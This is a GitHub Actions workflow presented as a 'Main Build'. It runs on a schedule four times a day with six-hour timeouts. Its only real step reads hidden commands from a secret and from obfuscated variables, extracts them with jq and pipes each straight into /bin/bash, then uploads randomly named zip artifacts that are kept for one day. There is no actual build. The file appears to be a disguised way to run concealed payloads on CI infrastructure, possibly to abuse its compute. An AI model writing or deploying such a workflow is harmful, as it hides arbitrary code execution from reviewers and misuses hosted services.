name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '55 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          xzclg3: ${{ secrets.xzclg3 }}
        run: |
          printf '%s' "$xzclg3" | jq -r .ppl8 | /bin/bash
          echo $u521 | jq -r .eg1 | /bin/bash
          echo $ux79 | jq -r .dmbma18754 | /bin/bash
          printf '%s' "$jkty53170" | jq -r .zk927 | /bin/bash
          printf '%s' "$bsbs12273" | jq -r .wkvgn234 | /bin/bash
          printf '%s' "$hnqf9237" | jq -r .bpiae31579 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: aAL3wMY2
          path: "*.zip"
          retention-days: 1
